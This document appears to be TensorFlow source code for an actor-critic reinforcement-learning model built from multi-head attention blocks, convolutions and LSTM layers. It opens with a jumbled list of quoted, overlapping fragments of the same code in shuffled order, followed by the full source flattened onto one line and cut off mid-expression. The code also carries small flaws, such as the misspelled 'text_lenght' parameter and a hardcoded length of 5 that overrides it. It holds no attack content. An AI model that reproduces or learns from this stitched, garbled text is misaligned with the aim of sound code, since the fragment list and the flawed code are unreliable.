self.bidirectional_lstm", "self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out =", "for attention_block in self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self,", "numpy as np def scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q, k, transpose_b=True)", "x = attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10,", "depth) k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth) v = self.split_heads(v,", "lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5,", "tf.concat([x, z], -1) for attention_block in self.attention_blocks: x = attention_block(x) return self.lstm_layer(x) class", "0 self.depth = d_model // self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv", "vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor", "to 1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights,", "[x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1) for attention_block in", "actor_output = self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output =", "tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add the mask to the", "def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units =", "attn_output) else: x = self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x) ff_output =", "tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3]) def call(self,", "dimension into (num_heads, depth). Transpose the result such that the shape is (batch_size,", "z): x = self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024,", "32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim,", "self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3]) def call(self, v, k, q,", "output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer): def", "block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm =", "last axis (seq_len_k) so that the scores # add up to 1. attention_weights", "num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k, v, mask) scaled_attention =", "super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6)", "Actor actor_output = self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output", "Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy as", "tf.transpose(x, perm=[0, 2, 1, 3]) def call(self, v, k, q, mask): batch_size =", "= self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape == (batch_size, num_heads,", "split_heads(self, x, batch_size): \"\"\"Split the last dimension into (num_heads, depth). Transpose the result", "text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding =", "x, z): # Critic value = self.critic(x, z) # Actor actor_output = self.actor(x,", "def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model = d_model assert", "up to 1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output =", "self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x", "shape is (batch_size, num_heads, seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads,", "= Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer", "z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184,", "self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model) def", "axis (seq_len_k) so that the scores # add up to 1. attention_weights =", "into (num_heads, depth). Transpose the result such that the shape is (batch_size, num_heads,", "8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block =", "seq_len_k, depth) v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape", "self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim,", "= self.critic(x, z) # Actor actor_output = self.actor(x, z) std = tf.zeros_like(actor_output) +", "tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist = tfp.distributions.Normal(loc=actor_output, scale=std) return", "k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth) v = self.split_heads(v, batch_size)", "== 0 self.depth = d_model // self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model)", "Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so outputs have the same shape", "last dimension into (num_heads, depth). Transpose the result such that the shape is", "return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5,", "(seq_len_k) so that the scores # add up to 1. attention_weights = tf.nn.softmax(scaled_attention_logits,", "i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self, x, z, training, mask=None): z", "Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy as np def", "d_model % self.num_heads == 0 self.depth = d_model // self.num_heads self.wq = Dense(d_model)", "self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units)", "vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name,", "batch_size = tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len, d_model) k = self.wk(k)", "embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5,", "Dense(d_model) self.wk = Dense(d_model) self.wv = Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x,", "def call(self, x, z): x = self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def", "self.depth = d_model // self.num_heads self.wq = Dense(d_model) self.wk = Dense(d_model) self.wv =", "ff_output = self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x", "matmul_qk = tf.matmul(q, k, transpose_b=True) # (..., seq_len_q, seq_len_k) # scale matmul_qk dk", "std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist = tfp.distributions.Normal(loc=actor_output,", "1, 3]) def call(self, v, k, q, mask): batch_size = tf.shape(q)[0] q =", "self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output) return x class SharedBlock(Layer): def __init__(self,", "-1e9) # softmax is normalized on the last axis (seq_len_k) so that the", "(batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3]) def call(self, v,", "Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the last dimension into (num_heads, depth). Transpose", "num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs):", "num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, #", "(batch_size, seq_len, d_model) k = self.wk(k) # (batch_size, seq_len, d_model) v = self.wv(v)", "depth_v) return output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads", "embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x, z): x = self.shared_block(x, z)", "seq_len_q, depth) k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth) v =", "Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for", "embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs)", "if mask is not None: scaled_attention_logits += (mask * -1e9) # softmax is", "in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self, x, z): x", "self.critic(x, z) # Actor actor_output = self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd)", "+ tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist = tfp.distributions.Normal(loc=actor_output, scale=std) return value,", "= Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the last dimension", "z = tf.reshape(tf.tile(z, [x.shape[1], 1]), [x.shape[0], x.shape[1], z.shape[1]]) x = tf.concat([x, z], -1)", "x = tf.concat([x, z], -1) for attention_block in self.attention_blocks: x = attention_block(x) return", "MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model = d_model", "num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, text_lenght=5, kernel_size=5, in_lstm_units = 32, embedding_out = 8, actor_activation=False):", "= Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size,", "+ ff_output) return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184,", "# (..., seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads):", "batch_size) # (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth)", "attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model", "MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size,", "z) return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out", "tensorflow_probability as tfp from tensorflow.keras import Model, Sequential from tensorflow.keras.layers import Activation, Layer,", "self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3]) def call(self, v, k, q, mask):", "in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units =", "text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self,", "None: scaled_attention_logits += (mask * -1e9) # softmax is normalized on the last", "assert d_model % self.num_heads == 0 self.depth = d_model // self.num_heads self.wq =", "= num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out =", "# (..., seq_len_q, seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits =", "matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) # add the", "# attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights = scaled_dot_product_attention( q, k,", "in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self, x, z, training, mask=None): z =", "# Critic value = self.critic(x, z) # Actor actor_output = self.actor(x, z) std", "= 32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies = num_policies,", "training, mask=None): z = self.embedding(z) z = self.bidirectional_lstm(z) z = tf.reshape(tf.tile(z, [x.shape[1], 1]),", "num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]),", "num_filters=num_filters, residual=i!=0, last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self, x,", "= 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out,", "Bidirectional import numpy as np def scaled_dot_product_attention(q, k, v, mask): matmul_qk = tf.matmul(q,", "kernel_size=5, in_lstm_units = 32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies", "the last axis (seq_len_k) so that the scores # add up to 1.", "3]) def call(self, v, k, q, mask): batch_size = tf.shape(q)[0] q = self.wq(q)", "dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x,", "so outputs have the same shape as inputs. padding='same') self.activation_layer = Activation('relu') self.dense1", "self.last: ff_output = self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x =", "x = self.shared_block(x, z) return self.dense_layer(x) class ActorCritic(Model): def __init__(self, num_policies, hidden_dim=1024, num_filters=128,", "Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual", "self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output)", "in_lstm_units = 32, embedding_out = 8, actor_activation=False): super(ActorCritic, self).__init__() self.actor = Actor(num_policies =", "% self.num_heads == 0 self.depth = d_model // self.num_heads self.wq = Dense(d_model) self.wk", "scores # add up to 1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q,", "output, attention_weights class MultiHeadAttention(Layer): def __init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads", "AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1, residual=True, last=False, **kwargs): super(AttentionBlock,", "z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist =", ",name='logstd') self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x, z):", "self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size) # (batch_size,", "num_heads, seq_len_q, depth) k = self.split_heads(k, batch_size) # (batch_size, num_heads, seq_len_k, depth) v", "name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5,", "num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention, attention_weights =", "num_heads, seq_len, depth) \"\"\" x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x,", "last=i==num_blocks-1) for i in range(num_blocks)] self.lstm_layer = LSTM(lstm_units) def call(self, x, z, training,", "self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last def call(self, x, training,", "<gh_stars>1-10 import tensorflow as tf import tensorflow_probability as tfp from tensorflow.keras import Model,", "= self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x) ff_output = self.dense2(ff_output) ff_output =", "__init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units = 32,", "attention_weights = scaled_dot_product_attention( q, k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1,", "= 8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block", "vocabulary_size=184, embedding_out = 8, in_lstm_units = 32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name,", "matmul_qk / tf.math.sqrt(dk) # add the mask to the scaled tensor. if mask", "embedding_out = embedding_out) self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x, z): x =", "Dropout, LayerNormalization, LSTM, Embedding, Bidirectional import numpy as np def scaled_dot_product_attention(q, k, v,", "(..., seq_len_q, seq_len_k) # scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk", "self.actor_activation = actor_activation if self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x, z): #", "def split_heads(self, x, batch_size): \"\"\"Split the last dimension into (num_heads, depth). Transpose the", "scaled_dot_product_attention( q, k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) #", "embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self, x, z): x = self.shared_block(x, z)", "self.dense_layer = Dense(num_policies, name='actor_output') def call(self, x, z): x = self.shared_block(x, z) return", "SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units", "add the mask to the scaled tensor. if mask is not None: scaled_attention_logits", "to the scaled tensor. if mask is not None: scaled_attention_logits += (mask *", "self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks = [AttentionBlock(hidden_dim=hidden_dim, num_filters=num_filters, residual=i!=0,", "SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units = in_lstm_units, embedding_out = embedding_out) self.dense_layer", "# (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return", "32, kernel_size=5, name=\"critic\", **kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks,", "lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters,", "**kwargs): super(AttentionBlock, self).__init__(name=name, **kwargs) self.attention_layer = MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 =", "that the scores # add up to 1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) #", "training=training) x = self.layernorm2(x + ff_output) return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024,", "self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters, kernel_size=kernel_size, # Use", "= Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units = in_lstm_units, text_lenght=5, embedding_out = embedding_out, vocabulary_size=vocabulary_size)", "scaled_attention_logits += (mask * -1e9) # softmax is normalized on the last axis", "self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024,", "v = self.split_heads(v, batch_size) # (batch_size, num_heads, seq_len_v, depth) # scaled_attention.shape == (batch_size,", "self.d_model)) # (batch_size, seq_len_q, d_model) output = self.dense(concat_attention) # (batch_size, seq_len_q, d_model) return", "# softmax is normalized on the last axis (seq_len_k) so that the scores", "embedding_out = 8, text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name,", "32, text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units,", "# scale matmul_qk dk = tf.cast(tf.shape(k)[-1], tf.float32) scaled_attention_logits = matmul_qk / tf.math.sqrt(dk) #", "1, 3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model))", "if not self.last: ff_output = self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training)", "inputs. padding='same') self.activation_layer = Activation('relu') self.dense1 = Dense(hidden_dim/2) self.dense2 = Dense(hidden_dim) self.dropout2 =", "text_lenght=5, kernel_size=5, name=\"actor\", **kwargs): super(Actor, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks,", "self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x + ff_output) return x class", "3]) # (batch_size, seq_len_q, num_heads, depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) #", "= residual self.last = last def call(self, x, training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x))", "if self.residual: x = self.layernorm1(x + attn_output) else: x = self.layernorm1(attn_output) if not", "d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model = d_model assert d_model %", "outputs have the same shape as inputs. padding='same') self.activation_layer = Activation('relu') self.dense1 =", "= self.wv(v) # (batch_size, seq_len, d_model) q = self.split_heads(q, batch_size) # (batch_size, num_heads,", "mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth)", "as tfp from tensorflow.keras import Model, Sequential from tensorflow.keras.layers import Activation, Layer, Dense,", "# scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q,", "self.residual = residual self.last = last def call(self, x, training, mask=None): cl_output =", "d_model) v = self.wv(v) # (batch_size, seq_len, d_model) q = self.split_heads(q, batch_size) #", "import Model, Sequential from tensorflow.keras.layers import Activation, Layer, Dense, Conv1D, BatchNormalization, Dropout, LayerNormalization,", "mask is not None: scaled_attention_logits += (mask * -1e9) # softmax is normalized", "k, q, mask): batch_size = tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len, d_model)", "self.actor_activation: self.actor_activation_layer = Activation('sigmoid') def call(self, x, z): # Critic value = self.critic(x,", "is not None: scaled_attention_logits += (mask * -1e9) # softmax is normalized on", "= tf.reshape(x, (batch_size, -1, self.num_heads, self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3]) def", "embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if self.actor_activation:", "= self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x + attn_output) else: x =", "training, mask=None): cl_output = self.activation_layer(self.cnn_layer(x)) attn_output, _ = self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training)", "num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, text_lenght=5, in_lstm_units = 32, kernel_size=5, name=\"critic\",", "return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out =", "self.lstm_layer = LSTM(lstm_units) def call(self, x, z, training, mask=None): z = self.embedding(z) z", "**kwargs): super(Critic, self).__init__(name=name, **kwargs) self.shared_block = SharedBlock(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, vocabulary_size=vocabulary_size, text_lenght=5, in_lstm_units", "= in_lstm_units, embedding_out = embedding_out) self.dense_layer = Dense(1, name='critic_output') def call(self, x, z):", "d_model assert d_model % self.num_heads == 0 self.depth = d_model // self.num_heads self.wq", "depth) # scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads,", "= tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, seq_len_k) output = tf.matmul(attention_weights, v) # (...,", "x, z): x = self.shared_block(x, z) return self.dense_layer(x) class Critic(Layer): def __init__(self, hidden_dim=1024,", "self.actor(x, z) std = tf.zeros_like(actor_output) + tf.exp(self.logstd) if self.actor_activation: actor_output = self.actor_activation_layer(actor_output) dist", "call(self, x, z): # Critic value = self.critic(x, z) # Actor actor_output =", "= embedding_out, vocabulary_size=vocabulary_size) self.logstd = tf.Variable(np.zeros([1, num_policies]), dtype=tf.float32 ,name='logstd') self.actor_activation = actor_activation if", "normalized on the last axis (seq_len_k) so that the scores # add up", "depth) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.d_model)) # (batch_size, seq_len_q, d_model) output =", "= 8, text_lenght=5, in_lstm_units = 32, name=\"shared block\", kernel_size=5, **kwargs): super(SharedBlock, self).__init__(name=name, **kwargs)", "== (batch_size, num_heads, seq_len_q, depth) # attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k) scaled_attention,", "self.wv = Dense(d_model) self.dense = Dense(d_model) def split_heads(self, x, batch_size): \"\"\"Split the last", "x = self.layernorm2(x + ff_output) return x class SharedBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128,", "= in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units", "\"\"\"Split the last dimension into (num_heads, depth). Transpose the result such that the", "return output, attention_weights class AttentionBlock(Layer): def __init__(self, hidden_dim=1024, num_filters=128, kernel_size=5, name=\"attention block\", rate=0.1,", "# (batch_size, seq_len, d_model) k = self.wk(k) # (batch_size, seq_len, d_model) v =", "self.dropout2 = Dropout(rate) self.layernorm2 = LayerNormalization(epsilon=1e-6) self.residual = residual self.last = last def", "seq_len_k) output = tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return output, attention_weights class", "= Conv1D( filters=num_filters, kernel_size=kernel_size, # Use 'same' padding so outputs have the same", "__init__(self, d_model, num_heads): super(MultiHeadAttention, self).__init__() self.num_heads = num_heads self.d_model = d_model assert d_model", "= MultiHeadAttention(d_model=hidden_dim, num_heads=8) self.dropout1 = Dropout(rate) self.layernorm1 = LayerNormalization(epsilon=1e-6) self.cnn_layer = Conv1D( filters=num_filters,", "def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2, vocabulary_size=184, embedding_out = 8, in_lstm_units =", "num_blocks=num_blocks, in_lstm_units = in_lstm_units, vocabulary_size=vocabulary_size, embedding_out = embedding_out) self.critic = Critic(hidden_dim=hidden_dim, num_filters=num_filters, lstm_units=lstm_units,", "= attention_block(x) return self.lstm_layer(x) class Actor(Layer): def __init__(self, num_policies, hidden_dim=1024, num_filters=128, lstm_units=10, num_blocks=2,", "(batch_size, seq_len, d_model) q = self.split_heads(q, batch_size) # (batch_size, num_heads, seq_len_q, depth) k", "= self.dense1(x) ff_output = self.dense2(ff_output) ff_output = self.dropout2(ff_output, training=training) x = self.layernorm2(x +", "tensorflow as tf import tensorflow_probability as tfp from tensorflow.keras import Model, Sequential from", "= tf.shape(q)[0] q = self.wq(q) # (batch_size, seq_len, d_model) k = self.wk(k) #", "+ attn_output) else: x = self.layernorm1(attn_output) if not self.last: ff_output = self.dense1(x) ff_output", "self.attention_layer(cl_output,cl_output,cl_output,mask) attn_output = self.dropout1(attn_output, training=training) if self.residual: x = self.layernorm1(x + attn_output) else:", "super(SharedBlock, self).__init__(name=name, **kwargs) self.embedding = Embedding(vocabulary_size, embedding_out, input_length=text_lenght) self.bidirectional_lstm = Bidirectional(LSTM(in_lstm_units)) self.attention_blocks =", "self).__init__() self.actor = Actor(num_policies = num_policies, hidden_dim=hidden_dim, text_lenght=5, num_filters=num_filters, lstm_units=lstm_units, num_blocks=num_blocks, in_lstm_units =", "= tf.matmul(attention_weights, v) # (..., seq_len_q, depth_v) return output, attention_weights class MultiHeadAttention(Layer): def", "# add up to 1. attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1) # (..., seq_len_q, 